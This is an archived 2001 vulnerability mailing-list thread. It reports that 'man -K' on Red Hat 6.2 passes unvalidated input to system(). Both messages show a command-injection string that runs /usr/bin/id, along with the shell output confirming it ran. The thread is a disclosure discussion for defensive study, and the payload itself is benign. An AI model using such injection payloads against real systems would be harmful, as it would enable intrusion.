Vulnerability Development mailing list archives

Re: man -K input validation


From: Reb <reb () openrecords org>
Date: Wed, 21 Feb 2001 00:39:26 -0600

When I do the following on a Redhat 6.2 on 2.2.14:

 man -K "';`/usr/bin/id`"

I get this repeatedly until I ctrl-c out of it:

sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/man3/Tk_DeleteSelHandler.3'
sh: syntax error near unexpected token `;uid=501(r'
sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/man3/DeleteImg.3'
sh: syntax error near unexpected token `;uid=501(r'
sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/man3/Tk_DeleteImage.3'

Reb
-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Rasta C. Shell
Sent: Tuesday, February 20, 2001 8:54 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: man -K input validation

I don't know if this will be of any interest since I don't think
it can give you man's uid/gid, but while looking at the man source code to
see what's seg-faulting on -K <longbuff> (didn't find anything; maybe
it's grep that faults?) I noticed that the -K <input> line is not
being validated before calling system, so: man -K "';`/usr/bin/id`"
will run /usr/bin/id by man for you. Luckily there's a setuid/gid call
before system.


--
http://www.rshell.org
Join #shellcode on EFnet.
rasta () rshell org
